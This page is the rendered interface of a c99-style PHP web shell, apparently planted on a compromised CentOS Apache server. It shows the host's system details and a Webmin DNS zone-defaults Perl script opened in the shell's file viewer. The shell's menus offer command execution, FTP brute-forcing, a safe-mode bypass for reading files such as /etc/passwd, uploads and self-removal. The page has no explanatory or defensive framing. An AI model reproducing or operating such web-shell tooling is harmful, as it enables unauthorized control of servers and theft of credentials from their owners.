!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/bind8/   drwxr-xr-x
Free 50.94 GB of 127.8 GB (39.86%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     save_zonedef.cgi (2.83 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# save_zonedef.cgi
# Save zone defaults

require './bind8-lib.pl';
&ReadParse();
&error_setup($text{'zonedef_err'});
$access{'defaults'} || &error($text{'zonedef_ecannot'});

&lock_file(&make_chroot($config{'named_conf'}));
&lock_file("$module_config_directory/zonedef");
$conf = &get_config();
$options = &find("options", $conf);
foreach $c ("master", "slave", "response") {
    push(@check, { 'name' => 'check-names',
               'values' => [ $c, $in{$c} ] }) if ($in{$c});
    }
&save_directive($options, 'check-names', \@check, 1);
&save_addr_match("allow-transfer", $options, 1);
&save_addr_match("allow-query", $options, 1);
&save_choice("notify", $options, 1);

$in{'refresh'} =~ /^\d+$/ || &error(&text('master_erefresh', $in{'refresh'}));
$in{'retry'} =~ /^\d+$/ || &error(&text('master_eretry', $in{'retry'}));
$in{'expiry'} =~ /^\d+$/ || &error(&text('master_eexpiry', $in{'expiry'}));
$in{'minimum'} =~ /^\d+$/ || &error(&text('master_eminimum', $in{'minimum'}));
%zonedef = ( 'refresh', $in{'refresh'},
         'retry', $in{'retry'},
         'expiry', $in{'expiry'},
         'minimum', $in{'minimum'},
         'refunit', $in{'refunit'},
         'retunit', $in{'retunit'},
         'expunit', $in{'expunit'},
         'minunit', $in{'minunit'} );

&lock_file("$module_config_directory/config");
foreach $k (keys %config) {
    delete($config{$k}) if ($k =~ /^tmpl_/);
    }
$j=0;
for($i=0; defined($in{"name_$i"}); $i++) {
    next if (!$in{"name_$i"});
    $in{"type_$i"} eq 'A' || !$in{"def_$i"} ||
        &error($text{'master_eiptmpl'});
    $config{"tmpl_$j"} = join(' ', $in{"name_$i"}, $in{"type_$i"},
              $in{"value_${i}_def"} ? () : ( $in{"value_$i"} ) );
    $j++;
    }
$config{'tmpl_email'} = $in{'email'};
if ($in{'include_def'}) {
    delete($config{'tmpl_include'});
    }
else {
    -r $in{'include'} && !-d $in{'include'} ||
        &error($text{'master_einclude'});
    $config{'tmpl_include'} = $in{'include'};
    }
if ($in{'prins_def'}) {
    delete($config{'default_prins'});
    }
else {
    $in{'prins'} =~ /^[a-z0-9\.\-\_]+$/i ||
        &error($text{'zonedef_eprins'});
    $config{'default_prins'} = $in{'prins'};
    }
if (defined($in{'dnssec'})) {
    $config{'tmpl_dnssec'} = $in{'dnssec'};
    $config{'tmpl_dnssec_dt'} = $in{'dnssec_dt'};
    if ($config{'tmpl_dnssec_dt'}) {
        $config{'tmpl_dnssec_dne'} = $in{'dnssec_dne'};
    } else {
        $config{'tmpl_dnssecalg'} = $in{'alg'};
        ($ok, $err) = &compute_dnssec_key_size($in{'alg'}, $in{'size_def'},
                                               $in{'size'});
        &error($err) if (!$ok);
        $config{'tmpl_dnssecsizedef'} = $in{'size_def'};
        $config{'tmpl_dnssecsize'} = $in{'size'};
        $config{'tmpl_dnssecsingle'} = $in{'single'};
    }
}
&save_module_config();
&unlock_file("$module_config_directory/config");

&save_zone_defaults(\%zonedef);
&flush_file_lines();
&unlock_file(&make_chroot($config{'named_conf'}));
&unlock_file("$module_config_directory/zonedef");
&webmin_log("zonedef", undef, undef, \%in);
&redirect("");


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0075 ]--